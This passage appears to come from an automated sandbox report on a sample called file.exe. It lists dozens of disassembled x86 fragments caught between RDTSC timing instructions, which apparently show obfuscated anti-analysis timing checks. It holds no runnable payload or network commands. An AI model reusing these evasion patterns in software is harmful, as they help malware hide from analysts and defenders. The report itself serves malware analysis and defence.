Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40D1 second address: 8F40EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40EC second address: 8F4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB7D509B848h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 stc 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D3889h], edx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D3858h], eax 0x00000032 je 00007FB7D509B84Ch 0x00000038 mov dword ptr [ebp+122D3A6Dh], eax 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FB7D509B848h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a call 00007FB7D509B849h 0x0000005f push ecx 0x00000060 jnp 00007FB7D509B848h 0x00000066 pop ecx 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b jne 00007FB7D509B846h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4173 second address: 8F41DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007FB7D50A5EE5h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FB7D50A5EDBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push edi 0x0000001e push eax 0x0000001f jbe 00007FB7D50A5ED6h 0x00000025 pop eax 0x00000026 pop edi 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FB7D50A5ED8h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 lea ebx, dword ptr [ebp+12458D75h] 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c je 00007FB7D50A5ED6h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E6599 second address: 8E65E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B846h 0x00000008 jmp 00007FB7D509B851h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 pushad 0x00000012 jno 00007FB7D509B846h 0x00000018 jg 00007FB7D509B846h 0x0000001e jo 00007FB7D509B846h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jnp 00007FB7D509B846h 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CAA second address: 912CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CB0 second address: 912CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CB6 second address: 912CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CBA second address: 912CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CD3 second address: 912CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007FB7D50A5EDCh 0x0000000e jnp 00007FB7D50A5EE4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912CFF second address: 912D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913158 second address: 913160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D7F second address: 913D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D89 second address: 913D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913D8F second address: 913D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909090 second address: 909098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909098 second address: 90909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A53 second address: 8E9A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB7D50A5ED6h 0x0000000a jnl 00007FB7D50A5ED6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A63 second address: 8E9A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9A67 second address: 8E9A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914525 second address: 91456A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B84Ch 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 push edi 0x00000015 jmp 00007FB7D509B857h 0x0000001a pop edi 0x0000001b pushad 0x0000001c jbe 00007FB7D509B846h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91456A second address: 914579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FB7D50A5ED6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146B4 second address: 9146EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007FB7D509B846h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D509B854h 0x00000016 jmp 00007FB7D509B852h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146EB second address: 9146EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9146EF second address: 9146F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C75 second address: 914C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C79 second address: 914C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914C7D second address: 914C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9169E9 second address: 9169ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9169ED second address: 916A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB7D50A5EE5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 916A0B second address: 916A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B84Bh 0x00000008 jbe 00007FB7D509B846h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A89B second address: 91A8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A8A9 second address: 91A8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB7D509B855h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91FC35 second address: 91FC52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91FC52 second address: 91FC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D509B858h 0x0000000b pop edi 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F2E8 second address: 91F2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F2F3 second address: 91F2F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91F55F second address: 91F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922301 second address: 92230B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92230B second address: 92230F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223C4 second address: 9223CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223CD second address: 9223E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007FB7D50A5EEFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9223E0 second address: 92240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B851h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB7D509B84Ch 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92240D second address: 922414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922414 second address: 922446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov si, 3F19h 0x0000000d call 00007FB7D509B849h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB7D509B858h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922446 second address: 92244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92244A second address: 922450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922450 second address: 92246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92246D second address: 9224FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB7D509B851h 0x0000000e push esi 0x0000000f jno 00007FB7D509B846h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c push ebx 0x0000001d jmp 00007FB7D509B858h 0x00000022 pop ebx 0x00000023 pop ebx 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007FB7D509B857h 0x0000002d jmp 00007FB7D509B854h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FB7D509B859h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922643 second address: 922649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922649 second address: 92264D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92313E second address: 923142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923142 second address: 923146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923146 second address: 92314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92314C second address: 923153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923153 second address: 92317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a sub dword ptr [ebp+122D27A9h], edx 0x00000010 stc 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923557 second address: 923574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B854h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923BB7 second address: 923C1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EE9h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2760h], edi 0x0000002d sub dword ptr [ebp+122D31F6h], ecx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D2E46h], esi 0x0000003b push 00000000h 0x0000003d or dword ptr [ebp+1245949Dh], edx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C1A second address: 923C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C1F second address: 923C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C51 second address: 926C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DEA second address: 924DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C57 second address: 926CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB7D509B848h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edi, 7340C3B1h 0x0000002d push 00000000h 0x0000002f sub dword ptr [ebp+122D25C2h], eax 0x00000035 movsx esi, dx 0x00000038 push 00000000h 0x0000003a mov di, ax 0x0000003d xchg eax, ebx 0x0000003e jp 00007FB7D509B850h 0x00000044 push eax 0x00000045 pushad 0x00000046 jl 00007FB7D509B84Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DEE second address: 924DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924DF2 second address: 924E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928126 second address: 92813F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92955A second address: 929575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928921 second address: 928925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928925 second address: 928945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B84Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B84Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92ED54 second address: 92EDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 movzx ebx, ax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 and di, 7519h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FB7D50A5ED8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 stc 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jno 00007FB7D50A5ED6h 0x00000053 pop edi 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D008 second address: 92D095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB7D509B852h 0x0000000b jmp 00007FB7D509B854h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 cmc 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007FB7D509B84Ch 0x00000022 js 00007FB7D509B856h 0x00000028 call 00007FB7D509B84Fh 0x0000002d pop ebx 0x0000002e pop ebx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jmp 00007FB7D509B850h 0x0000003b mov eax, dword ptr [ebp+122D1249h] 0x00000041 mov ebx, dword ptr [ebp+122D32C6h] 0x00000047 push FFFFFFFFh 0x00000049 clc 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jo 00007FB7D509B846h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EDBC second address: 92EDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EDCB second address: 92EDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEE7 second address: 92EEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEEB second address: 92EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EEF1 second address: 92EF87 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D50A5ED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB7D50A5ED8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 and edi, 5B2CD2D7h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 add dword ptr [ebp+122D27A9h], ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007FB7D50A5ED8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b call 00007FB7D50A5EE1h 0x00000060 cmc 0x00000061 pop edi 0x00000062 mov eax, dword ptr [ebp+122D0D7Dh] 0x00000068 mov edi, dword ptr [ebp+122D27C2h] 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007FB7D50A5EDBh 0x00000075 push eax 0x00000076 push edi 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 930E2E second address: 930EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007FB7D509B852h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D2BD2h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB7D509B848h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 or ebx, dword ptr [ebp+122D3858h] 0x00000037 mov dword ptr [ebp+122D38BEh], ecx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FB7D509B848h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 